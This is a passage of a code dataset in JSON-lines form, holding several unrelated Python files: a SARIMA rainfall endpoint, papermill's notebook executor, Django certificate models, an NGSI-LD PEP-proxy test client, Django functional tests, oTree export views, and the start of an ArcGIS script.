pred_mean.loc[ts_train.index])\n    dict_data['rmse_test']=get_rmse(ts_test, pred_mean.loc[ts_test.index])\n    dict_data['AIC']=model_results.aic\n    dict_data['BIC']=model_results.bic\n    \n\n    # Persist the dictionary\n    _id = db2.SARIMA_predictions.insert(dict_data)\n    \n    message=\"Finalizado em \" + tempoFinalização.strftime(\"%Y/%m/%d às %H:%M:%S\") + \". (ID: \" + str(_id) + \")\"\n\n    del dict_data['date']\n    del dict_data['_id']\n\n    \n    print(message)\n    print('\\n')\n    print('----------------------- Sucesso! ----------------------------')\n    print('\\n')\n\n    return jsonify({'message':message,'result':dict_data})","sub_path":"machine_learning/RainfallSARIMA.py","file_name":"RainfallSARIMA.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246933516","text":"import os\nimport time\n\nimport nbformat\nfrom jupyter_client.kernelspec import get_kernel_spec\nfrom nbconvert.preprocessors import ExecutePreprocessor\nfrom nbconvert.preprocessors.execute import CellExecutionError\n\nfrom papermill.conf import settings\nfrom papermill.exceptions import PapermillException\nfrom papermill.iorw import load_notebook_node, write_ipynb, read_yaml_file\n\nfrom six import string_types\n\n\nclass PapermillExecutePreprocessor(ExecutePreprocessor):\n\n    def preprocess(self, nb, resources):\n        \"\"\"\n        The default preprocess behavior if allow_errors = True is to continue executing all the cells.\n        We want the notebook to cease execution and then write out the state of the notebook with the traceback\n        on the cell that failed.\n        \"\"\"\n        # Clear out all outputs prior to execution.\n        for cell in nb.cells:\n            cell.outputs = []\n\n        # Catch CellExecutionError if thrown which lets this method finish so we can write the state of the notebook\n        # to disk.\n        try:\n            nb, resources = super(PapermillExecutePreprocessor, self).preprocess(nb, resources)\n        except CellExecutionError:\n            pass\n\n        return nb, resources\n\n\ndef execute_notebook(notebook, output, parameters=None, kernel_name=None):\n    \"\"\"Executes a single notebook locally.\n\n    Args:\n        notebook (str): Path to input notebook.\n        output (str): Path to save executed notebook.\n        parameters (dict): Arbitrary keyword arguments to pass to the notebook parameters.\n        kernel_name (str): Name of kernel to execute the notebook against.\n\n    \"\"\"\n    nb = load_notebook_node(notebook)\n\n    # Parameterize the Notebook.\n    if parameters:\n        _parameterize_notebook(nb, kernel_name, parameters)\n\n    # Execute the Notebook.\n    t0 = time.time()\n    processor = PapermillExecutePreprocessor(\n        
timeout=None,\n kernel_name=kernel_name or nb.metadata.kernelspec.name,\n )\n processor.preprocess(nb, {})\n duration = time.time() - t0\n\n # Record specified environment variable values.\n nb.metadata.papermill['parameters'] = parameters\n nb.metadata.papermill['environment_variables'] = _fetch_environment_variables()\n nb.metadata.papermill['metrics']['duration'] = duration\n\n # Write Notebook to disk.\n write_ipynb(nb, output)\n\n\ndef _parameterize_notebook(nb, kernel_name, parameters):\n\n # Load from a file if 'parameters' is a string.\n if isinstance(parameters, string_types):\n parameters = read_yaml_file(parameters)\n\n # Generate parameter content based on the kernal_name\n kernel_name = kernel_name or nb.metadata.kernelspec.name\n param_content = _build_parameter_code(kernel_name, parameters)\n\n # Remove the old cell and replace it with a new one containing parameter content.\n param_cell_index = _find_parameters_index(nb)\n old_parameters = nb.cells[param_cell_index]\n before = nb.cells[:param_cell_index]\n after = nb.cells[param_cell_index + 1:]\n newcell = nbformat.v4.new_code_cell(source=param_content)\n newcell.metadata['tags'] = old_parameters.metadata.tags\n nb.cells = before + [newcell] + after\n\n\ndef _build_parameter_code(kernel_name, parameters):\n kernelspec = get_kernel_spec(kernel_name)\n if kernel_name in _parameter_code_builders:\n return _parameter_code_builders[kernel_name](parameters)\n elif kernelspec.language in _parameter_code_builders:\n return _parameter_code_builders[kernelspec.language](parameters)\n raise PapermillException(\n \"No parameter builder functions specified for kernel '%s' or language '%s'\" % (kernel_name, kernelspec.language)\n )\n\n\ndef _find_parameters_index(nb):\n parameters_indices = []\n for idx, cell in enumerate(nb.cells):\n if \"parameters\" in cell.metadata.tags:\n parameters_indices.append(idx)\n if not parameters_indices:\n raise PapermillException(\"No parameters tag found\")\n elif len(parameters_indices) > 1:\n raise PapermillException(\"Multiple parameters tags found\")\n return parameters_indices[0]\n\n\n# Registry for functions that build parameter assignment code.\n_parameter_code_builders = {}\n\n\ndef register_param_builder(name):\n \"\"\"Decorator for registering functions that write variable assignments for a given kernel or language.\"\"\"\n def wrapper(func):\n _parameter_code_builders[name] = func\n return func\n return wrapper\n\n\n@register_param_builder(\"python\")\ndef build_python_params(parameters):\n \"\"\"Writers parameter assignment code for Python kernels.\"\"\"\n param_content = \"# Parameters\\n\"\n for var, val in parameters.items():\n if isinstance(val, string_types):\n val = '\"%s\"' % val # TODO: Handle correctly escaping input strings.\n param_content += '%s = %s\\n' % (var, val)\n return param_content\n\n\n@register_param_builder(\"R\")\ndef build_r_params(parameters):\n \"\"\"Writes parameters assignment code for R kernels.\"\"\"\n param_content = \"# Parameters\\n\"\n for var, val in parameters.items():\n if isinstance(val, string_types):\n val = '\"%s\"' % val # TODO: Handle correctly escaping input strings.\n elif val is True:\n val = 'TRUE'\n elif val is False:\n val = 'FALSE'\n param_content += '%s = %s\\n' % (var, val)\n return param_content\n\n\ndef _fetch_environment_variables():\n ret = dict()\n for name, value in os.environ.items():\n if name in settings.ENVIRONMENT_VARIABLES:\n ret[name] = value\n return 
ret\n","sub_path":"papermill/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28575960","text":"from datetime import date\nfrom django.db import models\n\n\nclass Certificate(models.Model):\n month = ('Январь', 'Февраль', 'Март', 'Апрель', 'Май', 'Июнь', 'Июль',\n 'Август', 'Сентябрь', 'Октябрь', 'Ноябрь', 'Декабрь')\n MONTHS = tuple(enumerate(month, start=1))\n\n\n\n employee = models.ForeignKey(\n 'authentication.Employee',\n verbose_name='Сотрудник',\n on_delete=models.CASCADE\n )\n serial_number = models.CharField('№ квалификационного удостоверения',\n max_length=20\n )\n received_at_year = models.PositiveSmallIntegerField('Дата выдачи (год)')\n received_at_month = models.PositiveSmallIntegerField('Дата выдачи (месяц)',\n choices=MONTHS\n )\n received_at_day = models.PositiveSmallIntegerField('Дата выдачи (день)', null=True, blank=True)\n\n expired_at_year = models.PositiveSmallIntegerField('Срок действия (год)')\n expired_at_month = models.PositiveSmallIntegerField('Срок действия (месяц)',\n choices=MONTHS\n )\n expired_at_day = models.PositiveSmallIntegerField('Срок действия (день)', null=True, blank=True)\n\n control_types = models.ManyToManyField('ControlType', verbose_name='Вид контроля')\n degree = models.PositiveSmallIntegerField('Уровень',\n blank=True, null=True\n )\n\n class Meta:\n verbose_name = 'Удостоверение'\n verbose_name_plural = 'Удостоверения'\n\n def __str__(self):\n return 'Удостоверение № {} ({})'.format(self.serial_number, self.employee.fio())\n\n def details(self):\n received = '{:0>2}.{}'.format(self.received_at_month, self.received_at_year)\n expired = '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year)\n types = tuple(map(lambda x: str(x), self.control_types.all()))\n types_num = len(types)\n return (\n (self.serial_number, ) * types_num,\n (received, ) * types_num,\n (expired, ) * types_num,\n types,\n )\n\n def verbose_info(self):\n if self.control_types.filter(name='ПБ Ростехнадзора'):\n title = self.control_types.first().full_name\n else:\n level = ' {}-го уровня квалификации'.format(self.degree) if self.degree else ''\n control_types = ', '.join(tuple(map(lambda x: str(x), self.control_types.all())))\n title = 'Специалист{} по {}'.format(level, control_types)\n\n return [\n title,\n self.serial_number,\n '{:0>2}.{} г.'.format(self.expired_at_month, self.expired_at_year)\n ]\n\n def verbose_info2(self, control_type):\n level = {\n 1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V'\n }\n info = ['Исполнитель,']\n if not self.degree:\n info.append('специалист {},'.format(self.control_types.get(name=control_type)))\n else:\n info.append('специалист {} {} уровень,'.format(\n self.control_types.get(name=control_type),\n level.get(self.degree)))\n info.append('удостоверение № ' + self.serial_number)\n info.append('действительно до {:0>2}.{} г.'.format(\n self.expired_at_month,\n self.expired_at_year))\n return '
'.join(info)\n\n # TODO: разумнее перенести этот код в генератор отчётов\n def verbose_info3(self, control_type):\n info = ['Контроль выполнил:']\n second_line = ''\n level = {\n 1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V'\n }\n if not self.degree:\n info.append('Специалист по {}:'.format(self.control_types.get(name=control_type)))\n else:\n info.append('Специалист {} уровня по {}'.format(\n level.get(self.degree), self.control_types.get(name=control_type)\n ))\n if self.received_at_day:\n info.append('уд. №{} от {:0>2}.{:0>2}.{} г.'.format(self.serial_number, self.received_at_day, self.received_at_month, self.received_at_year))\n else:\n info.append(\n 'уд. №{} от {:0>2}.{} г.'.format(self.serial_number, self.received_at_month, self.received_at_year))\n return '
'.join(info)\n\n\n def info(self):\n received = '{:0>2}.{}'.format(self.received_at_month, self.received_at_year)\n expired = '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year)\n return {\n 'fio': self.employee.fio(),\n 'serial_number': self.serial_number,\n 'received': received,\n 'expired': expired,\n }\n\n def plain_details(self, delim=' '):\n return [delim.join(x) for x in self.details()] + [str(self.degree)]\n\n def get(self, name):\n return (\n self.serial_number,\n '{:0>2}.{}'.format(self.received_at_month, self.received_at_year),\n '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year),\n str(self.control_types.get(name=name)),\n self.degree,\n )\n\nclass ControlType(models.Model):\n name = models.CharField('Краткое обозначение вида контроля', max_length=30)\n full_name = models.CharField('Полное наименование вида контроля',\n max_length=200,\n blank=True, null=True\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Вид контроля'\n verbose_name_plural = 'Виды контроля'\n\nclass EBcertificate(models.Model):\n EB_GROUPS = (\n (1, 'I'),\n (2, 'II'),\n (3, 'III'),\n (4, 'IV'),\n (5, 'V'),\n )\n employee = models.OneToOneField(\n 'authentication.Employee',\n verbose_name='Сотрудник',\n on_delete=models.CASCADE\n )\n serial_number = models.CharField('№ удостоверения по ЭБ',\n max_length=20\n )\n received_at = models.DateField('Дата выдачи')\n expired_at = models.DateField('Срок действия')\n group = models.PositiveSmallIntegerField('Группа ЭБ', choices=EB_GROUPS)\n\n class Meta:\n verbose_name = 'Удостоверение по ЭБ'\n verbose_name_plural = 'Удостоверения по ЭБ'\n\n def __str__(self):\n return 'Удостоверение по ЭБ № {} ({})'.format(self.serial_number, self.employee.fio())\n\n def info(self):\n return {\n 'fio': self.employee.fio(),\n 'serial_number': self.serial_number,\n 'received': self.received_at.strftime('%d.%m.%Y'),\n 'expired': self.expired_at.strftime('%d.%m.%Y'),\n }\n\nclass SIZcertificate(models.Model):\n name = models.CharField('Продукция', max_length=50)\n clothes = models.FileField('Сертификат соответствия', blank=True, null=True, upload_to='uploads/')\n clothes_period_of_validity = models.DateField('Срок действия', blank=True, null=True)\n\n class Meta:\n verbose_name = 'Сертификат СИЗ'\n verbose_name_plural = 'Сертификаты СИЗ'\n\n def __str__(self):\n return self.name\n\nclass ExtraCertificate(models.Model):\n name = models.CharField('Название', max_length=50)\n extra_certificate = models.FileField('Сертификат', blank=True, null=True, upload_to='uploads/')\n extra_period_of_validity = models.DateField('Срок действия', blank=True, null=True)\n\n class Meta:\n verbose_name = 'Дополнительный сертификат'\n verbose_name_plural = 'Дополнительные сертификаты'\n\n def __str__(self):\n return self.name\n","sub_path":"gmp/apps/certificate/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24803354","text":"#\n#Copyright Odin Solutions S.L. 
All Rights Reserved.\n#\n#SPDX-License-Identifier: Apache-2.0\n#\n\nimport http.client\n\nimport configparser\nimport json\nfrom subprocess import Popen, PIPE\nimport ssl\n\nnoEncryptedKeys=[\"@id\",\"@type\",\"@context\"]\n\ndef get_chunk_size(resp):\n size_str = resp.read(2)\n if(size_str.decode('utf8').replace(\"'\", '\"')==\"\"):\n return 0\n while size_str[-2:] != b\"\\r\\n\":\n size_str += resp.read(1)\n return int(size_str[:-2], 16)\n\ndef get_chunk_data(resp,chunk_size):\n data = resp.read(chunk_size)\n resp.read(2)\n return data\n\ndef getstatusoutput(command):\n process = Popen(command, stdout=PIPE,stderr=PIPE)\n out, err = process.communicate()\n\n #print(\"out\")\n #print(out)\n #print(\"err\")\n #print(err)\n\n return (process.returncode, out)\n\n#This process consider ONLY a JSON format.\ndef decipherBodyAttributes(body):\n\n bodyBackUp = body\n\n try:\n\n for key in body:\n try:\n\n if(key.lower() not in noEncryptedKeys):\n #Verify, encriptation type.\n\n testEncryptCPABE = False\n\n testEncryptCPABE_CASE = False\n\n for key2 in body[key]:\n if (key2 == \"https://uri.etsi.org/ngsi-ld/default-context/encrypt_cpabe\"):\n if (body[key][key2][\"https://uri.etsi.org/ngsi-ld/hasValue\"]==\"encrypt_cpabe\"):\n testEncryptCPABE = True\n testEncryptCPABE_CASE = 1\n break\n\n if (key2 == \"encrypt_cpabe\"):\n if (body[key][key2][\"value\"]==\"encrypt_cpabe\"):\n testEncryptCPABE = True\n testEncryptCPABE_CASE = 2\n break\n\n\n if(testEncryptCPABE): #CPABE ENCRYPTATION\n\n if (testEncryptCPABE_CASE == 1):\n #Decipher attribute value\n codeValue, outValue = getstatusoutput([\"java\", \"-jar\", \"./conf_files/jar/cpabe_decipher.jar\",\n str(body[key][\"https://uri.etsi.org/ngsi-ld/hasValue\"])])\n\n if(codeValue == 0):\n #Assign decipher attribute value\n body[key][\"https://uri.etsi.org/ngsi-ld/hasValue\"] = outValue.decode('utf8')\n\n if (testEncryptCPABE_CASE == 2):\n\n #Decipher attribute value\n codeValue, outValue = getstatusoutput([\"java\", \"-jar\", \"./conf_files/jar/cpabe_decipher.jar\",\n str(body[key][\"value\"])])\n\n if(codeValue == 0):\n #Assign decipher attribute value\n body[key][\"value\"] = outValue.decode('utf8')\n\n except Exception as e:\n print(\"Error procesing key: \" + key)\n print(e)\n #return bodyBackUp, False\n\n return body, True\n\n except:\n return bodyBackUp, False\n\ndef pp_json(json_thing, sort=True, indents=4):\n if type(json_thing) is str:\n print(json.dumps(json.loads(json_thing), sort_keys=sort, indent=indents))\n\n else:\n print(json.dumps(json_thing, sort_keys=sort, indent=indents))\n return None\n\n\nif __name__ == '__main__':\n\n gcontext = ssl.SSLContext()\n\n #Obtain configuracion from config.cfg file.\n cfg = configparser.ConfigParser() \n cfg.read([\"./config.cfg\"]) \n \n keyrock_protocol = cfg.get(\"GENERAL\", \"keyrock_protocol\")\n keyrock_host = cfg.get(\"GENERAL\", \"keyrock_host\")\n keyrock_port = cfg.get(\"GENERAL\", \"keyrock_port\")\n keyrock_user = cfg.get(\"GENERAL\", \"keyrock_user\")\n keyrock_pass = cfg.get(\"GENERAL\", \"keyrock_pass\")\n\n capman_protocol = cfg.get(\"GENERAL\", \"capman_protocol\")\n capman_host = cfg.get(\"GENERAL\", \"capman_host\")\n capman_port = cfg.get(\"GENERAL\", \"capman_port\")\n\n policy_action = cfg.get(\"GENERAL\", \"policyGET_action\")\n policy_device = cfg.get(\"GENERAL\", \"policyGET_device\")\n policy_resource = cfg.get(\"GENERAL\", \"policyGET_resource\")\n\n pep_protocol = cfg.get(\"GENERAL\", \"pep_protocol\")\n pep_host = cfg.get(\"GENERAL\", \"pep_host\")\n pep_port = 
cfg.get(\"GENERAL\", \"pep_port\")\n\n headers = {\"Content-Type\":\"application/json\"}\n body = json.dumps({\"name\":keyrock_user,\"password\":keyrock_pass}).encode()\n\n keyRockMethod=\"POST\"\n keyRockUri=\"/v1/auth/tokens\"\n \n print(\"******* Sending authentication request to KeyRock... *******\")\n print(\"Method: \" + keyRockMethod)\n print(\"URI: \" + keyRockUri)\n print(\"Headers: \" + str(headers))\n print(\"Body: \" + str(body))\n\n if(keyrock_protocol.upper()==\"http\".upper() or keyrock_protocol.upper()==\"https\".upper()):\n \n if(keyrock_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(keyrock_host,keyrock_port)\n else:\n #conn = http.client.HTTPSConnection(keyrock_host,keyrock_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n\n conn = http.client.HTTPSConnection(keyrock_host,keyrock_port,\n context=gcontext)\n\n conn.request(keyRockMethod, keyRockUri, body, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n data = response.read()\n conn.close()\n\n if(status==201):\n #Example format: keyRockToken = \"4aece71b-8c22-4012-9397-608da3f58c6c\"\n keyRockToken = response.headers[\"X-Subject-Token\"]\n\n print(\"\\nAUTH SUCCESS: Authentication Keyrock Token obtained : \" + keyRockToken)\n\n headers = {\"Content-Type\":\"application/json\"}\n body = json.dumps({\"token\":keyRockToken,\"ac\":policy_action,\"de\":policy_device,\"re\":policy_resource}).encode()\n\n capmanMethod=\"POST\"\n capmanUri=\"/\"\n\n print(\"\\n******* Sending authorisation request to Capability Manager... *******\")\n print(\"Method: \" + capmanMethod)\n print(\"URI: \" + capmanUri)\n print(\"Headers: \" + str(headers))\n print(\"Body: \" + str(body))\n\n if(capman_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(capman_host,capman_port)\n else:\n #conn = http.client.HTTPSConnection(capman_host,capman_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n conn = http.client.HTTPSConnection(capman_host,capman_port,\n context=gcontext)\n\n conn.request(capmanMethod, capmanUri, body, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n data = response.read()\n conn.close()\n\n if(status==200):\n\n bodyJSON = json.loads(data.decode('utf8').replace(\"'\", '\"'))\n print(\"\\nSUCCESS: Authorisation Granted --> Capability token obtained : \" + str(bodyJSON))\n\n\n headers = {\"Accept\":\"application/ld+json\",\n \"x-auth-token\":json.dumps(bodyJSON)}\n\n print(\"\\n******* Sending NGSI-LD query to MDR through PEP_PROXY... 
*******\")\n print(\"Method: \" + policy_action)\n print(\"URI: \" + policy_resource)\n print(\"Headers: \" + str(headers))\n\n if(pep_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(pep_host,pep_port)\n else:\n #conn = http.client.HTTPSConnection(pep_host,pep_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n conn = http.client.HTTPSConnection(pep_host,pep_port,\n context=gcontext)\n conn.request(policy_action, policy_resource, None, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n #data = response.read()\n headersPEPResponse = response.headers\n\n response.chunked = False\n respBody = \"\"\n while True:\n chunk_size = get_chunk_size(response)\n if (chunk_size == 0):\n break\n else:\n chunk_data = get_chunk_data(response,chunk_size)\n #print(\"Chunk Received: \" + chunk_data.decode())\n respBody += chunk_data.decode()\n\n conn.close()\n\n print(\"\\nSUCCESS: NGSI-LD response:\\n\")\n print(\"* Code: \" + str(status))\n print(\"* Message: \" + str(reason))\n print(\"* Headers:\\n\" + str(headersPEPResponse))\n print(\"\\n* Body(cpabe_cipher):\\n\" + json.dumps(json.loads(respBody), sort_keys=True, indent=4))\n\n decipherRespBody = json.loads(respBody)\n\n if (decipherRespBody.get(\"@id\") or decipherRespBody.get(\"id\")): \n decipherRespBody,statusDecipher = decipherBodyAttributes(decipherRespBody)\n\n #print(type(decipherRespBody))\n #print(\"* DecipherBody:\")\n #print(json.loads(json.dumps(decipherRespBody)))\n #pp_json(decipherRespBody)\n\n print(\"\\n* Body(cpabe_decipher):\\n\" + json.dumps(decipherRespBody, sort_keys=True, indent=4))\n\n else:\n print(\"\\nFAILURE Authorisation Error --> Capability Manager.\")\n print(data)\n else:\n print(\"\\nFAILURE: Authentication Error --> Key Rock\")\n print(json.loads(data.decode('utf8').replace(\"'\", '\"')))\n else:\n print(\"Incorrect value for 'keyrock_protocol': \" + keyrock_protocol)\n\n","sub_path":"Extra/Security-Components/authorisation/Py_PEP-Proxy/test/python/Client_NGSILD/TestGET.py","file_name":"TestGET.py","file_ext":"py","file_size_in_byte":10641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357759725","text":"# Projekt aus dem Buch:\r\n# \"Test-driven development with Python\r\n#\r\n# Erstellt wird eine To-Do-Listen-WebApp \r\n\r\nfrom django.test import LiveServerTestCase\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.common.exceptions import WebDriverException\r\nimport time\r\n\r\nMAX_WAIT = 10\r\n\r\nclass NewVisitorTest(LiveServerTestCase):\r\n def setUp(self):\r\n self.browser = webdriver.Firefox()\r\n \r\n def tearDown(self):\r\n self.browser.quit()\r\n\r\n def wait_for_row_in_list_table(self, row_text):\r\n start_time = time.time()\r\n while True:\r\n try:\r\n table = self.browser.find_element_by_id('id_list_table')\r\n rows = table.find_elements_by_tag_name('tr')\r\n self.assertIn(row_text, [row.text for row in rows])\r\n return\r\n except (AssertionError, WebDriverException) as e:\r\n if time.time() - start_time > MAX_WAIT:\r\n raise e\r\n time.sleep(0.5)\r\n\r\n def test_can_start_a_list_for_one_user(self):\r\n # Edith hat von einer neuen, coolen Online-App gehört, die \r\n # To-Do-Listen verwalten kann. 
She goes straight to its \r\n        # homepage..\r\n        self.browser.get(self.live_server_url)\r\n\r\n        # She notices that the page title contains the text\r\n        # \"To-Do\"\r\n        self.assertIn('To-Do', self.browser.title)\r\n        header_text = self.browser.find_element_by_tag_name('h1').text\r\n        self.assertIn('To-Do', header_text)\r\n\r\n        # She can enter a first to-do item into a text box\r\n        inputbox = self.browser.find_element_by_id('id_new_item')\r\n        self.assertEqual(\r\n            inputbox.get_attribute('placeholder'),\r\n            'Enter a to-do item'\r\n        )\r\n\r\n        # She types \"Kaufe Pfauenfedern\" into the text box\r\n        inputbox.send_keys('Kaufe Pfauenfedern')\r\n\r\n        # As soon as she hits ENTER, the page refreshes and \r\n        # now shows \"1: Kaufe Pfauenfedern\" as an item in\r\n        # a to-do list table\r\n        inputbox.send_keys(Keys.ENTER)\r\n        time.sleep(1)\r\n        self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n\r\n        # The text box for entering to-do items is still \r\n        # there. She now enters: \"Stelle die Pfauenfedern in eine Vase\"\r\n        inputbox = self.browser.find_element_by_id('id_new_item')\r\n        inputbox.send_keys('Stelle die Pfauenfedern in eine Vase')\r\n        inputbox.send_keys(Keys.ENTER)\r\n        time.sleep(1)\r\n\r\n        # The page refreshes again and now shows both \r\n        # items in the to-do list\r\n        self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n        self.wait_for_row_in_list_table('2: Stelle die Pfauenfedern in eine Vase')\r\n\r\n        # Edith wonders whether the site will remember her list. \r\n        # Then she notices that the site has created an individual URL \r\n        # for her -- there is also some explanatory text about it\r\n        #self.fail('Finish the test!')\r\n\r\n        # She visits the URL - her to-do list is still there.\r\n\r\n    def test_multiple_users_can_start_lists_at_different_urls(self):\r\n        # Edith starts a new to-do list\r\n        self.browser.get(self.live_server_url)\r\n        inputbox = self.browser.find_element_by_id('id_new_item')\r\n        inputbox.send_keys('Kaufe Pfauenfedern')\r\n        inputbox.send_keys(Keys.ENTER)\r\n        self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n\r\n        # She notices that her list has an individual URL\r\n        edith_list_url = self.browser.current_url\r\n        self.assertRegex(edith_list_url, '/lists/.+')\r\n\r\n        # Now a new user, Francis, visits the site\r\n\r\n        ## We start a new browser session to make sure that no\r\n        ## information (cookies etc.) from Edith's session\r\n        ## is reused\r\n        self.browser.quit()\r\n        self.browser = webdriver.Firefox()\r\n\r\n        # Francis visits the homepage. 
Edith's list is nowhere \r\n        # to be seen\r\n        self.browser.get(self.live_server_url)\r\n        page_text = self.browser.find_element_by_tag_name('body').text\r\n        self.assertNotIn('Kaufe Pfauenfedern', page_text)\r\n        self.assertNotIn('Stelle die Pfauenfedern in eine Vase', page_text)\r\n\r\n        # Francis starts a new list by entering a new item\r\n        inputbox = self.browser.find_element_by_id('id_new_item')\r\n        inputbox.send_keys('Kaufe Milch')\r\n        inputbox.send_keys(Keys.ENTER)\r\n        self.wait_for_row_in_list_table('1: Kaufe Milch')\r\n\r\n        # Francis gets his own URL\r\n        francis_list_url = self.browser.current_url\r\n        self.assertRegex(francis_list_url, '/lists/.+')\r\n        self.assertNotEqual(francis_list_url, edith_list_url)\r\n\r\n        # Again, Edith's list is not visible (self.browser was missing here)\r\n        page_text = self.browser.find_element_by_tag_name('body').text\r\n        self.assertNotIn('Kaufe Pfauenfedern', page_text)\r\n        self.assertIn('Kaufe Milch', page_text)\r\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506452647","text":"from io import StringIO\nimport csv\nimport datetime\n\nfrom starlette.responses import Response\nfrom starlette.endpoints import HTTPEndpoint\nfrom . import cbv\n\nimport otree.common\nimport otree.models\nimport otree.export\nfrom otree.models.participant import Participant\nfrom otree.models.session import Session\nfrom otree.models_concrete import ChatMessage\nfrom otree.database import dbq\n\n\nclass Export(cbv.AdminView):\n    url_pattern = '/export'\n\n    def vars_for_template(self):\n\n        # can't use settings.OTREE_APPS, because maybe the app\n        # was removed from SESSION_CONFIGS.\n        app_names_with_data = set()\n        for session in dbq(Session):\n            for app_name in session.config['app_sequence']:\n                app_names_with_data.add(app_name)\n\n        custom_export_apps = []\n        for app_name in app_names_with_data:\n            models_module = otree.common.get_models_module(app_name)\n            if getattr(models_module, 'custom_export', None):\n                custom_export_apps.append(app_name)\n\n        return dict(\n            db_is_empty=not bool(dbq(Participant).first()),\n            app_names=app_names_with_data,\n            chat_messages_exist=bool(dbq(ChatMessage).first()),\n            custom_export_apps=custom_export_apps,\n        )\n\n\ndef get_csv_http_response(buffer: StringIO, filename_prefix) -> Response:\n    buffer.seek(0)\n    response = Response(buffer.read())\n    date = datetime.date.today().isoformat()\n    response.headers['Content-Type'] = 'text/csv'\n    response.headers[\n        'Content-Disposition'\n    ] = f'attachment; filename=\"{filename_prefix}-{date}.csv\"'\n    return response\n\n\nclass ExportSessionWide(HTTPEndpoint):\n    '''used by data page'''\n\n    url_pattern = '/ExportSessionWide/{code}'\n\n    def get(self, request):\n        code = request.path_params['code']\n        buf = StringIO()\n        if bool(request.GET.get('excel')):\n            # BOM\n            buf.write('\ufeff')\n        otree.export.export_wide(buf, session_code=code)\n        return get_csv_http_response(buf, 'all_apps_wide')\n\n\nclass ExportPageTimes(HTTPEndpoint):\n\n    url_pattern = '/ExportPageTimes'\n\n    def get(self, request):\n        buf = StringIO()\n        otree.export.export_page_times(buf)\n        response = get_csv_http_response(buf, 'PageTimes')\n        return response\n\n\nclass ExportChat(HTTPEndpoint):\n\n    url_pattern = '/chat_export'\n\n    def get(self, request):\n        buf = StringIO()\n        column_names = [\n            'session_code',\n            'id_in_session',\n            'participant_code',\n            'channel',\n            'nickname',\n            'body',\n            'timestamp',\n        ]\n\n        rows = (\n            
dbq(ChatMessage)\n .join(Participant)\n .order_by(ChatMessage.timestamp)\n .with_entities(\n Participant._session_code,\n Participant.id_in_session,\n Participant.session_id,\n ChatMessage.channel,\n ChatMessage.nickname,\n ChatMessage.body,\n ChatMessage.timestamp,\n )\n )\n\n writer = csv.writer(buf)\n writer.writerows([column_names])\n writer.writerows(rows)\n response = get_csv_http_response(buf, 'ChatMessages')\n return response\n","sub_path":"otree/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262407128","text":"# -*- coding: UTF-8 -*-\r\nimport arcpy\r\nimport sys\r\nfrom statistics import statsGrid\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\n\r\n# - 数据\r\n# -- 区域空间数据\r\nmobileGridFeature = \"wh_grid_250_54\" # 手机划分的格网数据\r\nidentifyPointJoinField = \"grid_id\" # 手机格网数据中的格网id字段,也是用来连接字段时识区域后点数据的id字段\r\nregionBoundaryFeature = \"BOUND_17\" # 统计识别区域数据\r\nregionIDFieldStr = \"QBM\" # 区域代码字段\r\n# -- 手机结果表格数据\r\n# --- 统计表\r\ngrid_WH = \"WH\" # 格子内居住工作人数数据表\r\ngrid_ID = \"GRID_ID\" # WH表格中代表格子id的字段\r\n# --- 流向表\r\nwork2HomeTable = \"W2H\" # 在某格工作到在某格居住数据表\r\nhome2WorkTable = \"H2W\" # 在某格居住到在某格工作数据表\r\nworkGridID = \"GRID_ID_W\" # W2H、H2W两张表里代表工作地格子id的字段\r\nhomeGridID = \"GRID_ID_H\" # W2H、H2W两张表里代表居住地格子id的字段\r\n# --- 公共属性字段\r\nWORK_NUM = \"WORK_NUM\" # WH、W2H表中表示工作人数字段\r\nHOME_NUM = \"HOME_NUM\" # WH、H2W表中表示居住人数字段\r\n# - 工作空间\r\narcpy.env.workspace = \"C:/MData/WorkAndHome.gdb\"\r\nprint(\"前期导入 -- 100%\")\r\ntry:\r\n\r\n arcpy.env.overwriteOutput = True\r\n '''\r\n # 要素转点\r\n print(\"格网转点...\")\r\n mobilePointFeature = mobileGridFeature + \"2Point\" # 格网转点数据\r\n arcpy.FeatureToPoint_management(mobileGridFeature, mobilePointFeature, \"CENTROID\")\r\n print(\"格网转点 -- 100%\")\r\n # 识别区域\r\n print(\"点区域识别...\")\r\n identifyPointFeatures = mobilePointFeature + \"IdBound\" # 